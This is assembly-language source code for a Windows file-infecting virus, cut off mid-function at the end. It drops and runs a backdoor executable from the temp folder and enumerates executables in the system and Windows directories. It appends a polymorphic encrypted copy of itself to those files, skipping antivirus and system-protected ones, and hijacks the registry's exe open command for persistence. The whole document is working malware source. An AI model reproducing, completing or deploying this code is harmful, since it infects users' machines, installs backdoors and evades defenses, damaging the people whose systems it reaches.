0,0,0,0,92,1,2,0,106,1,2,0,122,1,2,0 + db 0,0,0,0,136,1,2,0,0,0,0,0,150,1,2,0 + db 0,0,0,0,172,1,2,0,0,0,0,0,188,1,2,0 + db 0,0,0,0,198,1,2,0,0,0,0,0,212,1,2,0 + db 0,0,0,0,23,0,0,128,0,0,0,0,75,69,82,78 + db 69,76,51,50,46,68,76,76,0,65,68,86,65,80,73,51 + db 50,46,100,108,108,0,82,65,83,65,80,73,51,50,46,100 + db 108,108,0,83,72,69,76,76,51,50,46,100,108,108,0,85 + db 83,69,82,51,50,46,100,108,108,0,87,73,78,73,78,69 + db 84,46,100,108,108,0,87,73,78,77,77,46,100,108,108,0 + db 87,83,79,67,75,51,50,46,100,108,108,0,0,0,76,111 + db 97,100,76,105,98,114,97,114,121,65,0,0,71,101,116,80 + db 114,111,99,65,100,100,114,101,115,115,0,0,69,120,105,116 + db 80,114,111,99,101,115,115,0,0,0,82,101,103,67,108,111 + db 115,101,75,101,121,0,0,0,82,97,115,69,110,117,109,67 + db 111,110,110,101,99,116,105,111,110,115,65,0,0,0,83,104 + db 101,108,108,69,120,101,99,117,116,101,65,0,0,0,84,111 + db 65,115,99,105,105,0,0,0,70,116,112,80,117,116,70,105 + db 108,101,65,0,0,0,109,99,105,83,101,110,100,83,116,114 + db 105,110,103,65,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + + + + +BackdoorEnd dd 0 + +Backdoor db "DABACKDOOR.EXE",0 + + Drop_BackDoor proc + + sub esp, 280 + mov ebx, esp + + push ebx + push 255 + lea eax, dword ptr [ebp + szGetTempPathA] + Call K32Api + sub esp, 280 + + mov esi, ebx + mov edi, esp + @@: + lodsb + stosb + test al, al + jnz @B + dec edi + + .IF byte ptr [edi-1] != '\' + mov byte ptr [edi], '\' + inc edi + .ENDIF + lea esi, dword ptr [ebp + Backdoor] + + @@: + lodsb + stosb + test al, al + jnz @B + + + + mov esi, esp + mov edi, ebx + + push 0 + push FILE_ATTRIBUTE_NORMAL + push CREATE_ALWAYS + push 0 + push 0 + push GENERIC_WRITE + push esi + lea eax,[ebp+szCreateFileA] + Call K32Api + + .IF eax != INVALID_HANDLE_VALUE ; Error : file already exist + + mov ebx, eax + + push 0 + lea eax, dword ptr [ebp + BackdoorEnd] ; <- Written + push eax + push (OFFSET BackdoorEnd - OFFSET BackdoorStart) + lea eax, dword ptr [ebp + BackdoorStart] + push eax + push ebx + lea eax, dword ptr [ebp + szWriteFile] + Call K32Api + + lea eax,dword ptr [ebp + InfectionTime] + push eax + push eax + push eax + push ebx + lea eax, dword ptr [ebp + szSetFileTime] + Call K32Api + + + push ebx + lea eax,[ebp+szCloseHandle] + Call K32Api + + .ENDIF + + sub esp, SIZEOF STARTUPINFO + 40 + mov ebx, esp + push ebx + lea eax, dword ptr [ebp + szGetStartupInfoA] + Call K32Api + + sub esp, SIZEOF PROCESS_INFORMATION + 40 + mov edx, esp + + push edx + + xor eax,eax + push edx + push ebx + push edi + push eax + push NORMAL_PRIORITY_CLASS + push eax + push eax + push eax + push eax + push esi + lea eax, dword ptr [ebp + szCreateProcessA] + Call K32Api + + pop ebx + + + push [ebx+4] + lea eax, dword ptr [ebp + szCloseHandle] + Call K32Api + + add esp, (280 * 2 + SIZEOF PROCESS_INFORMATION + 40 + SIZEOF STARTUPINFO + 40) + + ret + Drop_BackDoor endp + + GetK32 proc + + + + + lea eax,[ErrKernl+ebp] + push eax + + + mov dword ptr [ebp + @StackPtr], esp + + xor edx,edx + push dword ptr fs:[edx] + mov dword ptr fs:[edx],esp + + + push 5 ; Scan 5 Pages + pop ecx + + _@1: cmp word ptr [esi],"ZM" + jz WeGotK32 + _@2: sub esi,10000h + dec ecx + jnz _@1 + WeFailed: + + + + xor esi,esi + WeGotK32: + xchg eax,esi + jmp K32Ok + ErrKernl: + xor eax, eax + K32Ok: + DB 0BCh + @StackPtr dd 00000000h + xor edx,edx + pop dword ptr fs:[edx] + + + db 0BDh + @@@Delta dd 00000000h + + ret + + + + GetK32 endp + + + + + GetGetProcAddressAddress proc + and dword ptr [ebp + ApiCounter],0 + mov edi,dword ptr [eax+3Ch] ;PE hdr + add edi,eax + assume edi:ptr IMAGE_NT_HEADERS + mov edi,[edi].OptionalHeader.DataDirectory.VirtualAddress + add edi,eax + assume edi:ptr IMAGE_EXPORT_DIRECTORY + mov ecx,[edi].NumberOfNames + mov esi,[edi].AddressOfNames + + + add esi,eax + xchg eax,ebx + MatchLp: + + lodsd + add eax,ebx + + push ecx + push edi + push esi + + push GPASIZE + pop ecx + lea edi,[ebp+szGetProcAddress] + mov esi,eax + repz cmpsb + + pop esi + pop edi + + or ecx,ecx + jz GPA_found + + inc dword ptr [ebp + ApiCounter] + + pop ecx + dec ecx + jnz MatchLp + + mov dword ptr [ebp + _GetProcAddress], 0bff76dach ; Not found. hardcode it ( Win95/98 ) + ret + + GPA_found: + + mov esi,[edi].AddressOfNameOrdinals + pop ecx + + + mov ecx,dword ptr [ebp + ApiCounter] + shl ecx,1 + add esi,ecx + add esi,ebx + xor eax,eax + lodsw + shl eax,2 + + add eax,[edi].AddressOfFunctions + mov esi,eax + add esi,ebx + lodsd + add eax,ebx + + assume edi :nothing + mov dword ptr [ebp + _GetProcAddress],eax + + ret + GetGetProcAddressAddress endp + + infect_newsystem proc + + + + lea ebx, dword ptr [ebp + szGetSystemDirectoryA] + xor ecx, ecx + inc ecx + @@: + push ecx + sub esp, 300 + mov esi, esp + push 0FFh ; Dir size + push esi ; buffer + mov eax, ebx + Call K32Api + mov eax, esi + call _strlen + mov ecx, esi + add ecx, eax + mov dword ptr [ecx], '*.*\' + mov byte ptr [ecx + 4], 0 + + mov eax, esi + Call InfectDir + add esp, 300 + lea ebx, dword ptr [ebp + szGetWindowsDirectoryA] + pop ecx + dec ecx + jns @B + ret + infect_newsystem endp + + InfectDir Proc + + + + + + sub esp, (SIZEOF (WIN32_FIND_DATA) + 400) + + mov ebx, esp + push ebx + push eax ; DirPath + lea eax, dword ptr [ebp+szFindFirstFileA] + CAll K32Api + inc eax + jz SHIT ; Fucking ERR_NOACCESS under XP! + dec eax + mov dword ptr [ebp + hFind], eax + + mov edi, esp + add edi, (SIZEOF (WIN32_FIND_DATA) + 4) + push edi + @@: + lodsb + cmp al, '*' + jz @F + stosb + jmp @B + @@: + xor al, al + stosb + pop esi + + + and byte ptr [ebp+InfectionCtr],0 + + FindLp: + assume ebx:ptr WIN32_FIND_DATA + + lea eax, dword ptr [[ebx].cFileName] + + push eax + mov edi,eax + xor ecx,ecx + dec ecx + xor al,al ; last byte 0 + repnz scasb + pop eax + or dword ptr [edi-5],20202020h + .IF dword ptr [edi-5] != 'exe.' && dword ptr [edi-5] != 'rcs.' + + jnz skipfile + + .ENDIF + + + + mov ecx,dword ptr [[ebx].nFileSizeHigh] ; skip large file + test ecx,ecx + jnz skipfile + + + + + push esi + push eax + mov eax, esi + call _strlen + mov ecx, esi + add ecx, eax + mov edx, ecx + mov edi, ecx + pop esi + + @@: + lodsb + stosb + or al,al + jnz @b + pop esi + + ;push edx + ;xor ecx, ecx + ;push ecx + ;push esi + ;push esi + ;push ecx + ;lea eax, dword ptr [ebp + szMessageBoxA] + ;Call U32Api + ;pop edx + + mov eax, esi + pushad + Call IsFileAV? + dec eax + popad + jz @F ; IS it an AV file ? + Call infect ; All criterias Ok? infect !!! + @@: + ;;---- + ;inc byte ptr [ebp + InfectionCtr] + + ;--- + and byte ptr [edx], 0 + skipfile: + + + push ebx + push dword ptr [ebp + hFind] + lea eax, dword ptr [ebp + szFindNextFileA] + CAll K32Api + cmp byte ptr [ebp + InfectionCtr], 7 ; infect 7 files in dir + jae ExitFind + + test eax,eax + jnz FindLp + + ExitFind: + push dword ptr [ebp+hFind] + lea eax,[ebp+szFindClose] ; Close Search handle + CAll K32Api + SHIT: + add esp, (SIZEOF (WIN32_FIND_DATA) + 400) + ret + InfectDir endp + + + + infect proc + + pushad + + + + mov dword ptr [ebp + pFileName],eax + + + xor esi,esi + and byte ptr [ebp + _SizeTestFailed], 0 ; Init Ok + + sub esp, 1100 + mov ebx, esp + + cmp dword ptr [ebp + hSFC], 0 ; Not W2k/Xp + jz Infect2nd + + + + push 1024 + push ebx + push -1 + push eax + push esi + push esi + lea eax, dword ptr [ebp + szMultiByteToWideChar] + Call K32Api + + lea eax, dword ptr [ebp + szSfcIsFileProtected] + push eax + push dword ptr [ebp + hSFC] + Call dword ptr [ebp + _GetProcAddress] + + or eax, eax ; Api not found ? + jz Infect2nd + + cmp byte ptr [eax], 0CCh + jz ZeroShit + + + push ebx ; + push esi ; 0 + Call eax ; Call SfcIsFileProtected + + or eax, eax + jz Infect2nd + add esp, 1100 + popad + ret ; It's Protected ! + + Infect2nd: + add esp, 1100 + + and dword ptr [ebp + Patched?],0 ; init error + + xor esi,esi + + push esi + push esi + push esi + push esi + lea eax, dword ptr [ebp + szCreateEventA] + Call K32Api + mov dword ptr [ebp + InfEvent], eax + + mov dword ptr [ebp + ThreadDelta], ebp + + lea eax, dword ptr [ebp + CheckInfectionTimeOutThreadID] + push eax + push esi + push esi + lea eax, dword ptr [ebp + CheckInfectionTimeOutThread] + push eax + push esi + push esi + lea eax, dword ptr [ebp + szCreateThread] + Call K32Api + + push eax + lea eax, dword ptr [ebp + szCloseHandle] + Call K32Api + + + + push dword ptr [ebp + pFileName] + lea eax, dword ptr [ebp + szGetFileAttributesA] ; Save Original attribs + Call K32Api + mov dword ptr [ebp + OriginalAttributes],eax + + + push FILE_ATTRIBUTE_NORMAL ; Reset attributes + push dword ptr [ebp + pFileName] + lea eax, dword ptr [ebp + szSetFileAttributesA] + + Call K32Api + + + + push esi + push FILE_ATTRIBUTE_NORMAL + push OPEN_EXISTING + push esi + push FILE_SHARE_READ or FILE_SHARE_WRITE + push GENERIC_READ or GENERIC_WRITE + push dword ptr [ebp + pFileName] + lea eax,[ebp+szCreateFileA] + Call K32Api + + inc eax + jz ErrOpen + dec eax + mov dword ptr [ebp+hFile],eax + + + lea eax,dword ptr [ebp + LastWriteTime] + push eax + lea eax,dword ptr [ebp + LastAccessTime] + push eax + lea eax,dword ptr [ebp + CreationTime] + push eax + push dword ptr [ebp+hFile] + lea eax, dword ptr [ebp + szGetFileTime] + Call K32Api + + + push esi + push esi + push esi + push PAGE_READWRITE + push esi + push dword ptr [ebp+hFile] + lea eax,[ebp+szCreateFileMappingA] + call K32Api + + + + or eax,eax + jz ErrMap1 + + mov dword ptr [ebp +hMap],eax + + push esi + push esi + push esi + push FILE_MAP_ALL_ACCESS + push dword ptr [ebp+hMap] + lea eax,[ebp+szMapViewOfFile] + call K32Api + + test eax,eax + jz ErrMap2 + + mov dword ptr [ebp +pMap],eax + + cmp word ptr [eax],IMAGE_DOS_SIGNATURE + jnz ErrInf + + + mov dword ptr [ebp + _Inf_ESP], esp + mov dword ptr [ebp + _Inf_EBP], ebp + ;mov dword ptr [ebp + _Inf_ESP2], esp + ;mov dword ptr [ebp + _Inf_EBP2], ebp + ;mov dword ptr [ebp + _Inf_ESP3], esp + ;mov dword ptr [ebp + _Inf_EBP3], ebp + + + + lea ecx,[ebp + inf_main_handler] + push ecx + + xor edx,edx + push dword ptr fs:[edx] + mov dword ptr fs:[edx],esp + + + + mov edi,[eax+3ch] + add edi,eax + cmp dword ptr [edi],IMAGE_NT_SIGNATURE + jnz ErrInf + + + + + assume edi: ptr IMAGE_NT_HEADERS + mov ecx,[edi].OptionalHeader.FileAlignment + mov dword ptr [ebp + FAlignment], ecx + + + movzx esi, word ptr [edi].FileHeader.SizeOfOptionalHeader + lea esi, [[edi].OptionalHeader + esi] ; esi pointe sur le premier IMAGE_SECTION_HEADER + + + movzx eax, word ptr [[edi].FileHeader.NumberOfSections] + dec eax + imul eax,eax,sizeof IMAGE_SECTION_HEADER + + add esi,eax ; esi pointe sur le dernier IMAGE_SECTION_HEADER + + + xor eax,eax + push eax + push dword ptr [ebp + hFile] + lea eax, dword ptr [ebp+szGetFileSize] + call K32Api + mov dword ptr [ebp + OldSize],eax + + cmp eax,MINIMUM_FILE_SIZE ; Avoid Small Files + jb ErrInf + + cmp eax,MAXIMUM_FILE_SIZE ; Avoid Big Files + ja ErrInf + + assume esi:ptr IMAGE_SECTION_HEADER + mov ecx,eax + mov edx,[esi].PointerToRawData + + ;.IF byte ptr [ebp + _SizeTestFailed] != 0 + ; push eax + + ;.ELSE + .IF dword ptr [esi].Misc.VirtualSize != 0 ; + push dword ptr [esi].Misc.VirtualSize + .ELSE + ;xor eax, eax + ;mov [eax], eax + push dword ptr [esi].SizeOfRawData; + .ENDIF + ;.ENDIF + + pop dword ptr [ebp + SizeRelative] + add edx, dword ptr [ebp + SizeRelative] + sub ecx,edx + sub eax,ecx + + + + mov dword ptr [ebp + Size2Align],eax ; offset where to start virus + + + + mov ecx,ZipSignLen + lea edi,[ebp + ZipSign] + repz cmpsb + + + test ecx,ecx + jz ErrInf ; test for winzip self extractor + + + Call UnMap + + + + + + + + + mov eax,dword ptr [ebp + Size2Align] + mov ecx,dword ptr [ebp + FAlignment] + add eax,MAX_POLY_SIZE + + + call _Align + xchg ecx,eax ;New File Size = Old File Size + VirusSize + + + .IF ecx < dword ptr [ebp + OldSize] ; would it cut file ? + ;inc byte ptr [ebp + _SizeTestFailed] ; security + + + xor edx,edx + pop dword ptr fs:[edx] + add esp, 4 + ;db 0BCh + ;_Inf_ESP2 dd 0 + ;db 0BDh + ;_Inf_EBP2 dd 0 + + + jmp CloseSetDateAttrib + .ENDIF + Call trunc_file + + + push esi ; esi == 0 + push ecx + push esi + push PAGE_READWRITE + push esi + push dword ptr [ebp+hFile] + lea eax,[ebp+szCreateFileMappingA] + call K32Api + + test eax,eax + jz ErrMap1 + mov dword ptr [ebp +hMap],eax + + + + push esi + push esi + push esi + push FILE_MAP_ALL_ACCESS + push dword ptr [ebp+hMap] + lea eax,[ebp+szMapViewOfFile] + call K32Api + test eax,eax + jz ErrMap2 + + mov dword ptr [ebp +pMap],eax + + mov edi,[eax+3ch] + add edi,eax + + + mov dword ptr [ebp + PEheader],edi + push dword ptr [edi].OptionalHeader.ImageBase + pop dword ptr [ebp + ImageBase] + ;mov eax, dword ptr [edi].OptionalHeader.SectionAlignment + ;mov dword ptr [ebp + SectionAlignment], eax + + movzx esi, word ptr [edi].FileHeader.SizeOfOptionalHeader + lea esi, [[edi].OptionalHeader + esi] ; esi pointe sur le premier IMAGE_SECTION_HEADER + + + + movzx eax, word ptr [[edi].FileHeader.NumberOfSections] + dec eax + imul eax,eax,sizeof IMAGE_SECTION_HEADER + + add esi,eax ; esi pointe sur le dernier IMAGE_SECTION_HEADER + + assume esi:ptr IMAGE_SECTION_HEADER + + + lea ebx,[ebp + szExitProcess] + lea edx,[ebp + Kernel] + Call CheckFunctionImported + mov dword ptr [ebp + _Exit1],eax + lea ebx,[ebp + exit] + xor edx,edx + Call CheckFunctionImported + mov dword ptr [ebp + _Exit2],eax + xor edx,edx + lea ebx,[ebp + _exit] + Call CheckFunctionImported + mov dword ptr [ebp + _Exit3],eax + + cmp dword ptr [ebp + _Exit1],0 + jnz PatchPlz + cmp dword ptr [ebp + _Exit2],0 + jnz PatchPlz + cmp dword ptr [ebp + _Exit3],0 + jnz PatchPlz + + jmp CannotPatch + + PatchPlz: + Call PatchExitFunc + or eax,eax + jnz PatchOk + + CannotPatch: + Call UnMap ; No Know Exit function, Resize File & quit... + + mov ecx,dword ptr [ebp + OldSize] + Call trunc_file + + xor edx,edx + pop dword ptr fs:[edx] + add esp, 4 + + ;db 0BCh + ;_Inf_ESP3 dd 0 + ;db 0BDh + ;_Inf_EBP3 dd 0 + jmp CloseSetDateAttrib + + PatchOk: + + ;---- + Call InitMemAccess ; Get data section offset + + ;---- + or [esi].Characteristics, 00000020h or 20000000h or 80000000h + mov eax, [[esi].PointerToRawData] + or eax,eax + jz ErrInf + + inc byte ptr [ebp+InfectionCtr] + + add eax,dword ptr [ebp + pMap] ;eax pointe sur le début de la derniere section + add eax,dword ptr [ebp + SizeRelative] ;eax pointe sur la fin de la derniere section + + mov edi, eax + + push esi + + mov dword ptr [ebp + FileOFFSET],edi + + push PAGE_EXECUTE_READWRITE + push MEM_RESERVE or MEM_COMMIT + push MAX_POLY_SIZE + push 0 + lea eax, dword ptr [ebp + szVirtualAlloc] + Call K32Api + + mov dword ptr [ebp + pAlloc],eax + + @@: + mov edi, dword ptr [ebp + pAlloc] + + + mov ecx, CryptSize ; Size of the virus to encrypt + lea esi, [ebp+VirusStart] + xor edx,edx + push ebx + Call PolyMain + pop ebx + + cmp dword ptr [ebp + PolyErrFlag], 1 + jz @B ; repair if a non-fatal error occured during polymorphism generation + cmp byte ptr [ebp + PolyMainErr], 0 ; rebuild all code if a fatal error occured + jnz @B + + + + + mov edi, dword ptr [ebp + FileOFFSET] + push ecx + shr ecx, 2 + inc ecx + + rep movsd ; Copy polymorphic virus to file + + + Call UnMap + pop ecx + mov eax, dword ptr [ebp + OldSize] + mov dword ptr [ebp + OldSize], ecx + add eax, ecx + add eax, 1000;-------------------------------------------------- + + + mov ecx,dword ptr [ebp + FAlignment] + call _Align + mov ecx,eax + + Call trunc_file + + xor esi, esi + push esi ; esi == 0 + push ecx + push esi + push PAGE_READWRITE + push esi + push dword ptr [ebp+hFile] + lea eax,[ebp+szCreateFileMappingA] + call K32Api + + test eax,eax + jz ErrMap1 + mov dword ptr [ebp +hMap],eax + + + + push esi + push esi + push esi + push FILE_MAP_ALL_ACCESS + push dword ptr [ebp+hMap] + lea eax,[ebp+szMapViewOfFile] + call K32Api + test eax,eax + jz ErrMap2 + + mov dword ptr [ebp +pMap],eax + + mov edi,[eax+3ch] + add edi,eax + mov dword ptr [ebp + PEheader],edi + movzx esi, word ptr [edi].FileHeader.SizeOfOptionalHeader + lea esi, [[edi].OptionalHeader + esi] ; esi pointe sur le premier IMAGE_SECTION_HEADER + movzx eax, word ptr [[edi].FileHeader.NumberOfSections] + dec eax + imul eax,eax,sizeof IMAGE_SECTION_HEADER + add esi,eax ; esi pointe sur le dernier IMAGE_SECTION_HEADER + pop eax + + mov ecx, dword ptr [ebp + SizeRelative] + add ecx, dword ptr [ebp + OldSize] + mov [esi].SizeOfRawData,ecx + mov [esi].Misc.VirtualSize,ecx + mov edi, dword ptr [ebp + PEheader] + mov eax,[esi].SizeOfRawData + add eax,[esi].VirtualAddress + mov [edi].OptionalHeader.SizeOfImage,eax + + ;--- + push MEM_DECOMMIT or MEM_RELEASE + push MAX_POLY_SIZE + push dword ptr [ebp + pAlloc] + lea eax, dword ptr [ebp + szVirtualFree] + Call K32Api + + + ;mov edi, dword ptr [ebp + PEheader] + mov ecx, dword ptr [edi].OptionalHeader.CheckSum ; Recalculate Checksum if needed + jecxz AfterCopy ; Skip Checksum + + lea eax, dword ptr [ebp + IMAGEHLP] + push eax + lea eax, dword ptr [ebp + szLoadLibraryA] + Call K32Api + or eax, eax + jz AfterCopy + + mov ebx, eax + + lea eax, dword ptr [ebp + szCheckSumMappedFile] + push eax + push ebx + Call dword ptr [ebp + _GetProcAddress] + + or eax, eax + jz FreeIMGHLP + + cmp byte ptr [eax], 0CCh + jz ZeroShit + + push eax + xor eax,eax + push eax + push dword ptr [ebp + hFile] + lea eax, dword ptr [ebp+szGetFileSize] + call K32Api + pop edx + + + lea ecx, dword ptr [edi].OptionalHeader.CheckSum + push ecx ; New Checksum + Call @F + dd ? ; Old Checksum + @@: + push eax ; FileSize + push dword ptr [ebp + pMap] ; MapAddr + Call edx ; Call CheckSumMappedFile + + FreeIMGHLP: + push ebx + lea eax, dword ptr [ebp + szFreeLibrary] + Call K32Api + + AfterCopy: + + + ErrInf: + + + +inf_main_handler: + + xor edx,edx + pop dword ptr fs:[edx] + + db 0BCh + _Inf_ESP dd 0 + db 0BDh + _Inf_EBP dd 0 + + + and byte ptr [ebp + _SizeTestFailed], 0 ; Clear error + + push dword ptr [ebp+pMap] + lea eax,dword ptr [ebp+szUnmapViewOfFile] + call K32Api + + ErrMap2: + push dword ptr [ebp+hMap] + lea eax, dword ptr [ebp+szCloseHandle] + call K32Api + + CloseSetDateAttrib: + lea eax,dword ptr [ebp + LastWriteTime] + push eax + lea eax,dword ptr [ebp + LastAccessTime] + push eax + lea eax,dword ptr [ebp + CreationTime] + push eax + push dword ptr [ebp+hFile] + lea eax, dword ptr [ebp + szSetFileTime] + Call K32Api + + ErrMap1: + + + push dword ptr [ebp+hFile] + lea eax, dword ptr [ebp+szCloseHandle] + call K32Api + ErrOpen: + + + + push dword ptr [ebp + OriginalAttributes] + push dword ptr [ebp + pFileName] + lea eax, dword ptr [ebp + szSetFileAttributesA] + Call K32Api + + ;assume edi:nothing + ;assume esi:nothing + + push dword ptr [ebp + InfEvent] + lea eax, dword ptr [ebp + szSetEvent] ; We did the job + Call K32Api + + cmp byte ptr [ebp + _SizeTestFailed], 0 + jnz Infect2nd + + + + + + popad + ret + infect endp + + +_MainHostFile db 0 +_MainHostFileName dd 0 + +CheckInfectionTimeOutThread: + + db 0BDh +ThreadDelta dd 00000000h + + + push 3000 ; TimeOut + push dword ptr [ebp + InfEvent] + lea eax, dword ptr [ebp + szWaitForSingleObject] + Call K32Api + + + .IF eax == WAIT_TIMEOUT ; infection hanged + .IF byte ptr [ebp + _MainHostFile] == 1 + + Call ReDoMainHost + + .ELSE + xor eax, eax + dec dword ptr [eax] ; Make fault then clear Mem and quit + .ENDIF + .ENDIF + + push dword ptr [ebp + InfEvent] + lea eax, dword ptr [ebp + szCloseHandle] + Call K32Api + + push eax + lea eax, dword ptr [ebp + szExitThread] + Call K32Api + ret + +ReDoMainHost: + Call UnMap + + push dword ptr [ebp+hFile] + lea eax, dword ptr [ebp + szCloseHandle] + Call K32Api + + push dword ptr [ebp + _MainHostFileName] + lea eax, dword ptr [ebp + szDeleteFileA] + Call K32Api + Call SetupRegHook + ret + +InfEvent dd 0 +CheckInfectionTimeOutThreadID dd 0 + +NTTargetFile db "taskman.exe",0 +W9xTargetFile db "runonce.exe",0 + +CompNameSize dd MAX_COMPUTERNAME_LENGTH + 1 +LenWinDirStr dd 0 +szKeyName db 'exefile\shell\open\command',0 +szRegHook db ' "%1" %*',0 +Disp dd 0 +pKey dd 0 +WinVer dd 0 + +;REGHOOK +;-------------------------------------------- install reg HOOK Procedures --------------------------- +SetupRegHook proc + + sub esp, 800h ; get some mem + mov eax, esp + push 0FFh ; Dir size + push eax ; buffer + lea eax, dword ptr [ebp + szGetSystemDirectoryA] + Call K32Api + + + mov edi, esp + xor ecx, ecx + ReachNull: + inc ecx + inc edi + cmp byte ptr [edi], 0 ; + jnz ReachNull + + mov dword ptr [ebp + LenWinDirStr], ecx + + mov byte ptr [edi], '\' + inc edi + .IF dword ptr [ebp + WinVer] == VER_PLATFORM_WIN32_NT + lea esi, dword ptr [ebp + NTTargetFile] + .ELSE + lea esi, dword ptr [ebp + W9xTargetFile] + .ENDIF + + @@: + lodsb + stosb + or al,al + jnz @B + + + mov edi, esp ; eax pointer to %systemroot%\target.exe + mov esi, edi + add esi, 0FFh + push esi + push edi + lea eax, dword ptr [ebp + szFindFirstFileA] + Call K32Api + + push eax + push eax + lea eax, dword ptr [ebp + szFindClose] + Call K32Api + pop eax + + inc eax + jnz @F ; not in this dir? + mov edi, esp + push 0FFh ; Dir size + push edi ; buffer + lea eax, dword ptr [ebp + szGetWindowsDirectoryA] + Call K32Api + xor ecx, ecx + jmp ReachNull + @@: + + + + + + + mov ebx, esi + add ebx, SIZEOF WIN32_FIND_DATA + + + + .IF dword ptr [ebp + WinVer] == VER_PLATFORM_WIN32_NT ; infect a copy of rundll on NT because SFC... + + mov dword ptr [ebp + CompNameSize], MAX_COMPUTERNAME_LENGTH + 1 + lea eax, dword ptr [ebp + CompNameSize] + push eax + push ebx + lea eax, dword ptr [ebp + szGetComputerNameA] + Call K32Api + + push ebx + mov eax, ebx + xor ecx, ecx + invert: + mov dl, byte ptr [eax+ecx] + + .IF dl == 0 + jmp CopyNow + .ELSEIF dl >= 41h && dl <= 5Ah + sub dl, 41h + mov bl, 25 + sub bl, dl + mov dl, 41h + add dl, bl + + .ELSEIF dl >= 61h && dl <= 7Ah + sub dl, 61h + mov bl, 25 + sub bl, dl + mov dl, 61h + add dl, bl + + .ENDIF + + mov byte ptr [eax+ecx], dl + inc ecx + jmp invert + + CopyNow: + pop ebx + mov esi, esp + mov edi, ebx + add edi, MAX_COMPUTERNAME_LENGTH + 1 + push edi + mov ecx, dword ptr [ebp + LenWinDirStr] + rep movsb + mov byte ptr [edi], '\' + inc edi + mov esi, ebx + @@: + lodsb + stosb + or al,al + jnz @B + pop edi + mov eax, edi + mov edi, esp + + + push eax + push 1 + push eax + push edi + lea eax, dword ptr [ebp + szCopyFileA] ; Copy the file + Call K32Api ; + pop eax ; WinNt, 2000, XP : infect copy + + .ELSE ; Win9x infect directly rundll32.exe + + + mov eax, esp ; infect original file + + .ENDIF + + push eax ; eax can be either a pointer to the full path of + ; runonce.exe (win9x) or a pointer to a "reversed" computername exe path (NT) + + + + mov dword ptr [ebp + _MainHostFileName], eax + + + mov byte ptr [ebp + _MainHostFile], 1 + Call infect ; infect it ! (Wont infect if we are running from it) + mov byte ptr [ebp + _MainHostFile], 0 + pop edi + + assume ebx : nothing + + + + lea eax, dword ptr [ebp + Disp] + push eax + lea eax, dword ptr [ebp + pKey] + push eax + xor eax, eax + push eax + push KEY_ALL_ACCESS + push REG_OPTION_NON_VOLATILE + push eax + push eax + lea eax, dword ptr [ebp + szKeyName] + push eax + push HKEY_CLASSES_ROOT + lea eax, dword ptr [ebp + szRegCreateKeyExA] + Call ADVAPI32Api + + lea esi, dword ptr [ebp + szRegHook] + mov eax, edi + call _strlen + push edi + add edi, eax + mov ecx, eax + @@: + lodsb + stosb + inc ecx + or al,al + jnz @B + pop edi + + + push ecx ; <- size of hookstring + push edi ; hookstring + push REG_SZ + xor eax, eax + push eax + push eax + push dword ptr [ebp + pKey] + lea eax, dword ptr [ebp + szRegSetValueExA] + Call ADVAPI32Api + + push dword ptr [ebp + pKey] + lea eax, dword ptr [ebp + szRegCloseKey] + Call ADVAPI32Api + + + add esp, 800h + ret + + +SetupRegHook endp + + + + + + + + + + + +; +; +;in: esi = pFileMap +;in: edi = RVA +; +;out: eax = File offset +; + + RVAToOffset PROC uses edi esi ecx + + assume esi:ptr IMAGE_DOS_HEADER + add esi,[esi].e_lfanew + assume esi:ptr IMAGE_NT_HEADERS + + mov edx,esi + add edx,sizeof IMAGE_NT_HEADERS + + movzx ecx,[esi].FileHeader.NumberOfSections + assume edx:ptr IMAGE_SECTION_HEADER + .while ecx>0 ; check all sections + .if edi>=[edx].VirtualAddress + mov eax,[edx].VirtualAddress + add eax,[edx].SizeOfRawData + .if edi